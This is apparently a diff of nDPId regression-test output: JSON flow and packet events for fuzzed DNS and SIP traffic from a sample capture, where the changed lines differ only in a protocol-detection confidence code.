+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1120470032178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470032178,"pkt":"ADBUADRWAODtAW69CABFAABIO2gAAIARTOnAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhIAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470033172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1120470033172,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470033172,"pkt":"ADBUADRWAODtAXO9CABFAABIamkAAIDwTOjAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp18mEDbmV0AAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1120470035175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470035175,"pkt":"ADBUADRWAODtAW69CABFAABIamoAAIARTOfAqAEiwKgBAQq6ADUANMsPhMQBAAABAAAAiwAABF9zaXAEX3VkcAQlcwBwB2JyVmp1bGEDbmV0AAAhAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1120470037178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470037178,"pkt":"ADBUADRWAODtAW69CABFAABIamsAAIARTObAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1120470041184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470041184,"pkt":"ADBUADRWAKDtAW69CABFAABIamwAAIARTOXAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469847979,"flow_last_seen":1120469856989,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1120470049185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470049185,"pkt":"ADBUAEFWAODtAW69CABFAABEam0AAIARTOjAqAECQ6gBAQq7ADUAMDM+8cUAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1120470049187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470049187,"pkt":"AODtJXMAADBUAG9WCABFAABbAABAAEARnD7AqAEBwKgBAgA1CrsARxW68cWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049188,"pkt":"ADBUADRWAODtAW69CABFAANSam4AAIARykzAqAECyER4URPEE0QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC9hLjCEClZpYTogU0lQLzIuMC9VRFEgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloR3ZiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCldyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2l2LmJydXJqdWxhLm5ldD47dGFnPTY0M1dlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDWwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgS05WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGNwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29uJXMAdDogPHNpcHM4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUizsT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQZyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLDE2OA4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRw32FwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zIi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtq3BWMTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1120470049190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470049190,"pkt":"ADBUADRWAODtAW69CABFAABIam8AAIARTOLAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049696,"flow_last_seen":1120470049696,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049696,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1120470049696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049696,"pkt":"ADBUADRWAODtAW69CABFAANSanAAAIARyurAqAECyER4URPEE8QDPvKbSU5WSVRFS3NpcDo5YTIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjg3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwGTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vczFwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udH5jdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMFo4MTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgZzcyNi0zMi84MDAwDXNhPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zRm5kcmVjdg